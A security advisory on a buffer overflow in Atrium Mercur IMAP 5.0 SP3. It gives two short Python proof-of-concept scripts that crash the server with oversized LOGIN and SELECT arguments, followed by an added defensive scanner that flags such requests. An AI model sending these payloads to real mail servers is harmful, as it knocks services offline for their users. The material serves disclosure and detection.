MERCUR Messaging 2005 IMAP Remote Buffer Overflow Vulnerability

The following proof of concept is available:

-- DoS Exploit --
# Atrium Mercur IMAP 5.0 SP3 DoS Exploit
# pre-authentication buffer overflow in imap command login
import socket
s=socket.socket()
s.connect(("127.0.0.1", 143))
print s.recv(256)
s.send("a001 login " + "\x41" * 275 + "\r\n")

# buffer overflow in imap commands like select and others
import socket
s=socket.socket()
s.connect(("127.0.0.1", 143))
print s.recv(256)
s.send("a001 login test test\r\n")
print s.recv(256)
s.send("a002 select " + "\x41" * 239 + "\r\n")


Exploit code as part of the Metasploit Framework project has been released.
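
A defensive counterpart to the proof-of-concept requests above, added here as an example and not part of the original advisory: it scans captured client-to-server IMAP lines and flags any command whose longest argument exceeds a limit, recording whether it arrived before a LOGIN. MAX_ARG_LEN, the function names and the sample lines are assumptions; the advisory does not state the exact length at which the overflow occurs.

```python
# Added example: flag IMAP client lines carrying oversized command arguments.
import re

MAX_ARG_LEN = 128  # assumed limit, not a value taken from the advisory
TAGGED = re.compile(rb"^(\S+) +([A-Za-z]+)(?: +(.*))?$")  # tag, command, arguments

def parse(line):
    """Split one client line into (tag, COMMAND, argument bytes), or None."""
    m = TAGGED.match(line.rstrip(b"\r\n"))
    if not m:
        return None
    return m.group(1), m.group(2).upper(), m.group(3) or b""

def scan_session(lines):
    """Walk one client-to-server stream and return a list of findings."""
    findings, authenticated = [], False
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        tag, cmd, rest = parsed
        # Longest whitespace-separated token; IMAP literals ({n}) are not handled.
        longest = max((len(a) for a in rest.split()), default=0)
        if longest > MAX_ARG_LEN:
            findings.append({
                "tag": tag.decode("ascii", "replace"),
                "command": cmd.decode("ascii"),
                "arg_len": longest,
                "pre_auth": not authenticated,
            })
        elif cmd == b"LOGIN":
            # Simplification: only client lines are seen, so a normal-sized
            # LOGIN is assumed to have been accepted by the server.
            authenticated = True
    return findings

# Constructed sample sessions shaped like the requests in the advisory.
PRE_AUTH_SESSION = [b"a001 login " + b"A" * 275 + b"\r\n"]
POST_AUTH_SESSION = [
    b"a001 login test test\r\n",
    b"a002 select INBOX\r\n",
    b"a003 select " + b"A" * 239 + b"\r\n",
]

if __name__ == "__main__":
    for name, session in (("pre-auth", PRE_AUTH_SESSION),
                          ("post-auth", POST_AUTH_SESSION)):
        for hit in scan_session(session):
            print(name, hit)
```

A pre-authentication hit deserves the higher priority, since it needs no valid account on the server.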


 

Copyright 2010, SecurityFocus